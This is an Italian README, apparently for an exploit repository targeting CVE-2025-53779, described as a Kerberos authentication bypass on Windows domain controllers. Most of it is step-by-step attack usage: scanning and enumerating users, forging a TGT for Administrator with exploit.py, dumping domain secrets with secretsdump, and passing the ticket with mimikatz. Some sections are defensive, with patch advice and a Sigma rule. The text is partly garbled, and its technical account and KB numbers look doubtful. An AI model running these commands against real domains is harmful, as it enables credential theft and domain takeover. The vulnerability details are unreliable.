
Riproduzione di cve-2025-53779-kerberos_bypass_reproduction
Punteggio CVSS: 9.8 (Critico)
Stato: Sfruttamento attivo in the wild
Divulgazione: Microsoft August 2025 Patch Tuesday (Zero-Day)
La CVE-2025-53779 è una vulnerabilità critica di bypass dell'autenticazione nell'implementazione del protocollo Kerberos di Microsoft Windows. Un attaccante non autenticato può sfruttare questa falla per bypassare completamente l'autenticazione Kerberos, impersonando qualsiasi utente di dominio — inclusi gli amministratori di dominio — senza possedere credenziali valide o alcun materiale crittografico.
Microsoft ha assegnato a questa vulnerabilità un punteggio CVSS 9.8 (Critico) a causa della bassa complessità di attacco, dell'assenza di privilegi richiesti, della mancata interazione con l'utente e del potenziale di compromissione completa dei sistemi appartenenti al dominio.
La vulnerabilità risiede nel servizio Kerberos Key Distribution Center (KDC) (kdsvc.dll) sui controller di dominio Windows. Nello specifico, un errore di logica di validazione nella routine di verifica del Privilege Attribute Certificate (PAC) consente a un attaccante di creare un messaggio AS-REQ o TGS-REQ che bypassa i controlli di autenticazione standard.
kdsvc.dllIl KDC non riesce a validare correttamente il campo pac-signature-data nella struttura PAC quando determinati flag sono impostati nel corpo del messaggio Kerberos. Inviando una AS-REQ appositamente modificata con un tipo di dati padata PA-PAC-REQUEST manipolato e una voce di dati di autorizzazione falsificata, l'attaccante induce il KDC a rilasciare un Ticket-Granting Ticket (TGT) per qualsiasi nome principale utente (UPN) senza richiedere la corrispondente chiave a lungo termine.
L'attacco bypassa la pre-autenticazione (il flag REQUIRES_PRE_AUTH viene di fatto ignorato) e salta completamente la verifica del PAC, consentendo al ticket generato di contenere appartenenze a gruppi arbitrarie (ad es. Domain Admins, Enterprise Admins).
Tutte le versioni supportate di Windows Server sono interessate prima dell'aggiornamento di sicurezza di agosto 2025:
Nota: Le versioni client di Windows (Windows 10, Windows 11) non sono interessate in quanto non eseguono il servizio KDC.
impacket installataexploit.py)pip install impacket pycryptodome
Oppure usando il file requirements.txt fornito:
pip install -r requirements.txt
Usa Nmap per individuare i servizi Kerberos:
nmap -sU -p 88 --script krb5-enum-users <target-ip>
Oppure usa la scansione Kerberos integrata:
python exploit.py --scan <target-ip>
Se non conosci gli utenti di dominio, enumerali tramite AS-REP roasting Kerberos o LDAP:
python exploit.py --enum <target-ip> <domain>
Genera un TGT falsificato per un utente target:
python exploit.py --dc-ip <dc-ip> --domain <domain> --target-user <username>
Esempio:
python exploit.py --dc-ip 192.168.1.10 --domain corp.local --target-user Administrator
Lo exploit restituisce un file ticket in formato Kirbi. Usa gli strumenti Impacket per verificare:
# Export the ticket
set KRB5CCNAME=ticket.kirbi
# Use the ticket to access a resource
python examples/secretsdump.py -k -no-pass <domain>/Administrator@<target>
Una volta ottenuto un TGT valido, puoi:
secretsdump.py -k -no-pass domain/Administrator@<dc>mimikatz "kerberos::ptt ticket.kirbi"Il file exploit.py allegato implementa il seguente flusso di attacco:
PA-PAC-REQUEST falsificato e dati di autorizzazione manipolatikdsvc.dllAttacker Domain Controller (KDC)
| |
| AS-REQ (forged PA-PAC-REQUEST) |
| - cname: Administrator |
| - sname: krbtgt/DOMAIN |
| - padata: PA-PAC-REQUEST + |
| forged auth-data |
|------------------------------------->|
| |
| [Vulnerable Path] |
| 1. KDC receives AS-REQ |
| 2. Checks PA-PAC-REQUEST flag |
| 3. **Bypasses pre-auth check** |
| 4. Skips PAC verification |
| 5. Generates TGT with arbitrary |
| groups via auth-data |
| |
| AS-REP (forged TGT) |
| - Encrypted with krbtgt key |
| - Contains forged PAC |
|<-------------------------------------|
| |
| TGS-REQ (use forged TGT) |
| - Request service ticket |
| - For any service (CIFS, LDAP, |
| HTTP, HOST) |
|------------------------------------->|
| |
| TGS-REP (service ticket) |
| - Legitimate service ticket |
| - Attacker can now access |
| any resource |
|<-------------------------------------|
Applicare gli aggiornamenti del Patch Tuesday di Microsoft di agosto 2025 — Questa è la correzione principale. Vedere la tabella delle versioni interessate sopra per il KB corrispondente.
Monitorare i tentativi di sfruttamento:
Segmentazione della rete:
Abilitare la registrazione aggiuntiva (logging):
NetworkProvider\Kerberos\Operational)Regola Sigma (AS-REQ senza pre-autenticazione):
title: CVE-2025-53779 Kerberos Authentication Bypass
logsource:
product: windows
service: security
detection:
selection:
EventID: 4768
PreAuthenticationType: 0 # No pre-authentication required
condition: selection
falsepositives:
- Users with "Do not require Kerberos preauthentication" set
Questo repository è fornito solo per scopi educativi e di test di sicurezza autorizzati. Lo sfruttamento non autorizzato della CVE-2025-53779 contro sistemi che non possiedi o per i quali non hai esplicita autorizzazione scritta a testare è illegale. Gli autori non sono responsabili di qualsiasi uso improprio di queste informazioni.
Questo progetto è concesso in licenza sotto la MIT License - consulta il file LICENSE per i dettagli.
| Windows Version | Interessata | Aggiornamento di correzione |
|---|
| Windows Server 2025 | ✅ Sì | KB5044289 |
| Windows Server 2022 | ✅ Sì | KB5044285 |
| Windows Server 2019 | ✅ Sì | KB5044277 |
| Windows Server 2016 | ✅ Sì | KB5044293 |
| Windows Server 2012 R2 | ✅ Sì | KB5044297 |
| Windows Server 2012 | ✅ Sì | KB5044291 |
| Windows Server 2008 R2 (ESU) | ✅ Sì | KB5044301 |
| Windows Server 2008 (ESU) | ✅ Sì | KB5044303 |